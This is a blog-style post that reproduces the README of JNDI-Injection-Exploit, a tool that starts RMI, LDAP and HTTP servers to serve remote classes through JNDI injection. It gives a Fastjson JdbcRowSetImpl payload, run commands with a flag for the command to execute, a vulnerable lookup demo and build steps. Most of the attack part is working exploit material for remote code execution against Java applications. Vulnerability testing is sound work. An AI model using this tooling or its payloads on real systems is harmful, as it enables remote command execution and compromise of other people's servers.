JNDI-Injection-Exploit : A Tool Which Generates JNDI Links

JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers

JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server, LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.

Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability.

For example, this is a Fastjson vul-poc:

{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://127.0.0.1:1099/Object”,”autoCommit”:true}

We can replace “rmi://127.0.0.1:1099/Object” with the link generated by JNDI-Injection-Exploit to test vulnerability.

Usage

Run as

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

where:

-C – command executed in the remote classfile.(optional , default command is “open /Applications/Calculator.app”)
-A – the address of your server, maybe an IP address or a domain.(optional , default address is the first network interface address)

Points for attention:

make sure your server’s ports (1099, 1389, 8180) are available .or you can change the default port in the run.ServerStart class line 26~28.
your command is passed to Runtime.getRuntime().exec() as parameters, so you need to ensure your command is workable in method exec().Command in bash like “bash -c ….” need to add Double quotes.

Examples

Local demo:

Start the tool like this:

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “open /Applications/Calculator.app” -A “127.0.0.1”

Assume that we inject the JNDI links like rmi://ADDRESS/jfxllc generated in step 1 to a vulnerable application which can be attacked by JNDI injection.

In this example, it looks like this:

public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup(“rmi://127.0.0.1/fgf4fp”);
}

then when we run this code, the command will be executed ,

and the log will be printed in shell.

Installation

We can select one of the two methods to get the jar.

Download the latest jar from Release.
Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).

$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git

$ cd JNDI-Injection-Exploit

$ mvn clean package -DskipTests

Download

R K

Next NTLMRecon : Enumerate Information From NTLM Authentication Enabled Web Endpoints »

Previous « OpenSquat : Detection Of Phishing Domains And Domain Squatting.

Burrow – Breaking Through Firewalls With Open Source Ingenuity

Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…

5 hours ago

Cyber security

Its-A-Trap : Building Secure Web Applications With A Golang Web Server For Authentication

Simple golang webserver that listens for basic auth or post requests and sends a notification…

5 hours ago

Cyber security

Nutek-Apple : Unleashing Power On macOS And Linux

Nutek Security Platform for macOS and Linux operating systems. Tools for hackers, bug hunters and…

5 hours ago

Cyber security

SecureSphere Labs – A Haven For Cybersecurity Innovators And Ethical Hackers

Welcome to SecureSphere Labs, your go-to destination for a curated collection of powerful hacking tools…

5 hours ago

Cyber security

Vulpes/VulpOS : The Docker-Powered All-in-One Workstation For Penetration Testing And Offsec Labs

All in one Docker-based workstation with hacking tools for Pentesting and offsec Labs by maintained…

5 hours ago

Hacking Tools

LiCo-Extrator : Revolutionizing Icon Extraction Across Platforms

Got it! Below is the updated README.md file with instructions for downloading the project on…

22 hours ago

Kali Linux Tutorials